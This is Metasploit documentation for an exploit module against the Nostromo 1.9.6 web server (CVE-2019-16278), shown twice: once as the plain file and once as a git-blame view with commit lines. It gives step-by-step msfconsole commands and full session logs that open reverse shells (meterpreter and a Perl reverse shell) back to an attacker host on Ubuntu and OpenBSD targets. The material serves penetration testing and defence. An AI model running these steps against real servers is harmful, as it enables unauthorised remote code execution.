documentation/modules/exploit/multi/http/nostromo_code_exec.md

## Vulnerable Application

Verified against:

* Nostromo 1.9.6 on Linux

Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/nostromo_code_exec`
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `check`
  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
  8. Do: `set lhost <ip>`
  9. Do: `exploit`
  10. You should get a shell.

## Scenarios

Example utilizing nostromo 1.9.6 on Ubuntu Linux.

```
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit
```

nostromo 1.9.6 on OpenBSD.

```
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y
[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit
```
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			`## Vulnerable Application`

			`Verified against:`

			`* Nostromo 1.9.6 on Linux`

Update documentation/modules/exploit/multi/http/nostromo_code_exec.md 2019-10-30 15:38:50 +01:00			`Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00
			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/http/nostromo_code_exec`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `check`
			7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
			8. Do: `set lhost <ip>`
			9. Do: `exploit`
			`10. You should get a shell.`

			`## Scenarios`

			`Example utilizing nostromo 1.9.6 on Ubuntu Linux.`

			```
			`msf5 > use exploit/multi/http/nostromo_code_exec`
Documentation updated based on latest module version. 2019-10-29 16:13:25 +01:00			`msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9`
			`RHOSTS => 192.168.1.9`
			`msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000`
			`RPORT => 8000`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			`msf5 exploit(multi/http/nostromo_code_exec) > check`
Documentation updated based on latest module version. 2019-10-29 16:13:25 +01:00			`[*] 192.168.1.9:8000 - The target appears to be vulnerable.`
			`msf5 exploit(multi/http/nostromo_code_exec) > set target 1`
			`target => 1`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			`msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp`
			`payload => linux/x86/meterpreter/reverse_tcp`
			`msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10`
			`LHOST => 192.168.1.10`
Documentation updated based on latest module version. 2019-10-29 16:13:25 +01:00			`msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444`
			`LPORT => 4444`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			`msf5 exploit(multi/http/nostromo_code_exec) > run`

Documentation updated based on latest module version. 2019-10-29 16:13:25 +01:00			`[*] Started reverse TCP handler on 192.168.1.10:4444`
			`[*] Configuring Automatic (Linux Dropper) target`
			`[*] Sending linux/x86/meterpreter/reverse_tcp command stager`
			`[*] Sending stage (985320 bytes) to 192.168.1.9`
			`[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			`[*] Command Stager progress - 100.00% done (763/763 bytes)`

			`meterpreter > sysinfo`
			`Computer : nostromo.local`
			`OS : Ubuntu 18.04 (Linux 4.15.0-62-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			`meterpreter > exit`
			`[*] Shutting down Meterpreter...`
Documentation updated based on latest module version. 2019-10-29 16:13:25 +01:00			`[*] 192.168.1.9 - Meterpreter session 2 closed. Reason: User exit`
			```

			`nostromo 1.9.6 on OpenBSD.`

			```
			`msf5 > use exploit/multi/http/nostromo_code_exec`
			`msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9`
			`RHOSTS => 192.168.1.9`
			`msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001`
			`RPORT => 8001`
			`msf5 exploit(multi/http/nostromo_code_exec) > check`
			`[*] 192.168.1.9:8001 - The target appears to be vulnerable.`
			`msf5 exploit(multi/http/nostromo_code_exec) > set target 0`
			`target => 0`
			`msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl`
			`payload => cmd/unix/reverse_perl`
			`msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10`
			`LHOST => 192.168.1.10`
			`msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444`
			`LPORT => 4444`
			`msf5 exploit(multi/http/nostromo_code_exec) > run`

			`[*] Started reverse TCP handler on 192.168.1.10:4444`
			`[*] Configuring Automatic (Unix In-Memory) target`
			`[*] Sending cmd/unix/reverse_perl command payload`
			`[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100`
			`id`
			`uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)`
			`uname -avr`
			`OpenBSD nostromo.local 6.4 GENERIC#349 amd64`
			`^C`
			`Abort session 1? [y/N] y`
			`[*] 192.168.1.9 - Command shell session 1 closed. Reason: User exit`
Add CVE-2019-16278 exploit documentation. 2019-10-21 21:15:04 +02:00			```